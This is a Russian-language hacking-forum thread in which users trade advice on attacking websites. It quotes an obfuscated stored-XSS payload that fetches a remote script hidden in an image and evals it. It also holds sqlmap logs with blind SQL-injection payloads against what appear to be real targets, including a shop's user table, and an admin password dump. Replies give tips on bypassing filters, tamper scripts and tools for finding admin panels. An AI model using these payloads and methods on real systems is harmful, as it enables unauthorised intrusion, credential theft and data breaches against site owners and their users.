[web-hacking] Ваши вопросы

[zdestuta]

На одном из форум XenForo увидел много сообщений с таким содержание

[DYNAMICURL='" style=position:absolute;opacity:0><img src=//k onerror="fetch(`htt`+`ps://**********/kalita.jpg`).then(x=&gt;x.text()).then(x=&gt;eval(x.slice(70048)))']k[/DYNAMICURL]

Что это?

это stored XSS же, в чистом виде, "канонический", с некоторой обфускацией (классическая "склейка") чтоб не палился.
а зачем ссылку попрятал? ведь ужасть как интересно чо там за скриптик фетчится (слайсится из jpg картинки, прикольно) то в случае успеха атаки...

 

[S-W-I-F-T]

это stored XSS же, в чистом виде, "канонический", с некоторой обфускацией (классическая "склейка") чтоб не палился.
а зачем ссылку попрятал? ведь ужасть как интересно чо там за скриптик фетчится (слайсится из jpg картинки, прикольно) то в случае успеха атаки...

это не я, админы наверно в автоцензор добавили, когда увидели

 

[chmod_777]

В инсте нашел Content Spoofing, xss не работает, обычный текст, что можно придумать?

 

[zdestuta]

обычный текст, что можно придумать?

примерно то же что и тут может? ;-)

 

[helixtwins]

Если сайт такого формата: site.com/p2p/php/gala
ну. явно было p2p.php?data, но переделали и заменили точки на/

Я пытался пихать такие ссылки в sqlmap, но он плевался и говорил, что неформат.

Это действительно неформат или я неправильно скармливал sqlmap такие штуки?

 

[synten]

как стать веб хакером?

 

[7h3_Qu1et_Bug]

как стать веб хакером?

Ты им уже не станешь, если задаешь такие вопросы

 

[zdestuta]

как стать веб хакером?

для этого надо... веб хакать! ;-)
и приходить сначала к документации, а только потом уже на форум с конкретными вопросами по таргетам.
почему не сразу на форум: документация даст тебя "кэширование" (в голове) типовых багов на вопросы о которых тут уже все устали отвечать, а нетиповых - в документации нет, это считай твой личный "НИОКР"

таргеты искать - начни с развлечения - с гугл дорков (GHDB в помощь для начала).
язвы искать - начни с исходников и понимания как "ручки" API работают end2end пройдись по ним - так у тебя понимание сформируется, и потом даже с закрытыми исходниками сформируется кагбэ "мат.ожидание" в голове "где они могли тут накосячить?" будешь заранее "предугадывать" почти инстинктивно.
потом ты это дело автоматизируешь и улов будет пожирнее, но автоматизировать то чего (пока ещё) не знаешь - задача практически невыполнимая, поэтому сначала всё "ручками-глазками".

 

[helixtwins]

not actual

 

[Anwar]

спасите-помогите, sqlmap определил тип bd как msaccess

[19:39:43] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP.NET, ASP, Django
back-end DBMS: Microsoft Access
[19:39:43] [WARNING] on Microsoft Access it is not possible to enumerate databases (use only '--tables')
[19:39:43] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 355 times

привычных бд там нет, надо сразу tables искать.
sqlmap искал не перебором, а через пейлоады и нашел аж две.
А там не может быть два tables, там форум.
собственно, где и как искать остальное все?

Очень странно что не бд. Иначе где храниться всем таблицам и тд. Почему не может быть 2 таблицы? даже если там форум. И что искать остальное? Очень много вопросов, на которые нет ответов...

 

[FantasticExploits]

Проверь является ли пользователь административным (--is-dba)

web server operating system: Windows
web application technology: ASP.NET, ASP, Django

C Твоими вводными вилик шанс того что ты можешь получить достп к командной оболочке.
Уточни цмс форума.

спасите-помогите, sqlmap определил тип bd как msaccess

[19:39:43] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP.NET, ASP, Django
back-end DBMS: Microsoft Access
[19:39:43] [WARNING] on Microsoft Access it is not possible to enumerate databases (use only '--tables')
[19:39:43] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 355 times

привычных бд там нет, надо сразу tables искать.
sqlmap искал не перебором, а через пейлоады и нашел аж две.
А там не может быть два tables, там форум.
собственно, где и как искать остальное все?

 

[helixtwins]

Проверь является ли пользователь административным (--is-dba)

web server operating system: Windows
web application technology: ASP.NET, ASP, Django

C Твоими вводными вилик шанс того что ты можешь получить достп к командной оболочке.
Уточни цмс форума.

права найти в msaccess нельзя, зато внезапно сдампил юзернейм и пароль админа. Как искать админку в 2026 году? (извините, но я правда не знаю)

 

[FantasticExploits]

права найти в msaccess нельзя, зато внезапно сдампил юзернейм и пароль админа. Как искать админку в 2026 году? (извините, но я правда не знаю)

Как и прежде, для перебора директорий:

DirBuster - https://github.com/KajanM/DirBuster
dirsearch - https://github.com/maurosoria/dirsearch

Для поиска админок на сабдомене (бывает что вынесена):

https://github.com/projectdiscovery/subfinder
http://crt.sh/

Для поиска на рандомных портах:
nmap
Дальше уже детали относительно ос/цмс/вебдемона:
Поиск лог фаилов (вебдемона/цмс) access/error
Поиск относительно цмс в бд
Поиск указывающих на блокировку скрипта авторизации например по ип
Альтернативные точки входа (бывает логин через юзерлогин)

 

[helixtwins]

у меня новая порция трудностей, я не нарочно
короче, сайт раскручен до имени дб, никакой информационной схемы
сбрутилось перебором 20 таблс, нашлась колонка, оттуда перебором вышел мыло-пасс. А дампить не дает. Как это пофиксить?
[12:49:42] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL unknown
[12:49:42] [INFO] fetching entries of column(s) 'email,pwd' for table 'user' in database 'shop_prod'
[12:49:42] [INFO] fetching number of column(s) 'email,pwd' entries for table 'user' in database 'shop_prod'
[12:49:42] [PAYLOAD] testing@example.com' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM shop_prod.user),1,1))>51) THEN 0x74657374696e67406578616d706c652e636f6d ELSE 0x28 END)) AND 'SzjQ'='SzjQ
[12:49:42] [PAYLOAD] testing@example.com' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM shop_prod.user),1,1))>54) THEN 0x74657374696e67406578616d706c652e636f6d ELSE 0x28 END)) AND 'SzjQ'='SzjQ
[12:49:43] [PAYLOAD] testing@example.com' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM shop_prod.user),1,1))>56) THEN 0x74657374696e67406578616d706c652e636f6d ELSE 0x28 END)) AND 'SzjQ'='SzjQ
[12:49:43] [PAYLOAD] testing@example.com' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM shop_prod.user),1,1))>57) THEN 0x74657374696e67406578616d706c652e636f6d ELSE 0x28 END)) AND 'SzjQ'='SzjQ
[12:49:43] [INFO] retrieved:
[12:49:43] [DEBUG] performed 4 queries in 1.49 seconds
[12:49:43] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[12:49:43] [WARNING] unable to retrieve the number of column(s) 'email,pwd' entries for table 'user'

 

[k4rk4j0i]

у меня новая порция трудностей, я не нарочно
короче, сайт раскручен до имени дб, никакой информационной схемы
сбрутилось перебором 20 таблс, нашлась колонка, оттуда перебором вышел мыло-пасс. А дампить не дает. Как это пофиксить?
[12:49:42] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL unknown
[12:49:42] [INFO] fetching entries of column(s) 'email,pwd' for table 'user' in database 'shop_prod'
[12:49:42] [INFO] fetching number of column(s) 'email,pwd' entries for table 'user' in database 'shop_prod'
[12:49:42] [PAYLOAD] testing@example.com' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM shop_prod.user),1,1))>51) THEN 0x74657374696e67406578616d706c652e636f6d ELSE 0x28 END)) AND 'SzjQ'='SzjQ
[12:49:42] [PAYLOAD] testing@example.com' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM shop_prod.user),1,1))>54) THEN 0x74657374696e67406578616d706c652e636f6d ELSE 0x28 END)) AND 'SzjQ'='SzjQ
[12:49:43] [PAYLOAD] testing@example.com' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM shop_prod.user),1,1))>56) THEN 0x74657374696e67406578616d706c652e636f6d ELSE 0x28 END)) AND 'SzjQ'='SzjQ
[12:49:43] [PAYLOAD] testing@example.com' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM shop_prod.user),1,1))>57) THEN 0x74657374696e67406578616d706c652e636f6d ELSE 0x28 END)) AND 'SzjQ'='SzjQ
[12:49:43] [INFO] retrieved:
[12:49:43] [DEBUG] performed 4 queries in 1.49 seconds
[12:49:43] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[12:49:43] [WARNING] unable to retrieve the number of column(s) 'email,pwd' entries for table 'user'

По пробуй этой тулзой, она слепые лучше крутит чем мапа https://github.com/r0oth3x49/ghauri

 

[kosh_e4ka]

По пробуй этой тулзой, она слепые лучше крутит чем мапа https://github.com/r0oth3x49/ghauri

да это не панацея, он лучше мапы только тетм что там есть xor. а в его случае можно поробовать --tamper=between, обычно такое в опенкарте прокатывает

 

[helixtwins]

да это не панацея, он лучше мапы только тетм что там есть xor. а в его случае можно поробовать --tamper=between, обычно такое в опенкарте прокатывает

Трижды уже ловлю эту беду за сегодня: дб находит, таблицы нет. Читал, это можно пофиксить как-то с барпом, но что конкретно надо делать? Подскажите пожалуйста, если можно.

 

[Johnny_Catswill]

Трижды уже ловлю эту беду за сегодня: дб находит, таблицы нет. Читал, это можно пофиксить как-то с барпом, но что конкретно надо делать? Подскажите пожалуйста, если можно.

Через бёрп прокси смотри ответы сервера на запросы sqlmap'а и ищи проблемные.

 

[FantasticExploits]

Трижды уже ловлю эту беду за сегодня: дб находит, таблицы нет. Читал, это можно пофиксить как-то с барпом, но что конкретно надо делать? Подскажите пожалуйста, если можно.

Тебе нужно дублировать запросы в burp (можешь конечно и редактором запросов просто в браузере) и смотреть что идет не так. Относительно ответов делать выводы о фильтрации и задаватся вопросом об обходе конкретных фильтров, если дело в них.

 

[vanga_s friend]

Трижды уже ловлю эту беду за сегодня: дб находит, таблицы нет. Читал, это можно пофиксить как-то с барпом, но что конкретно надо делать? Подскажите пожалуйста, если можно.

сделай что бы через бюрп работал sqlmap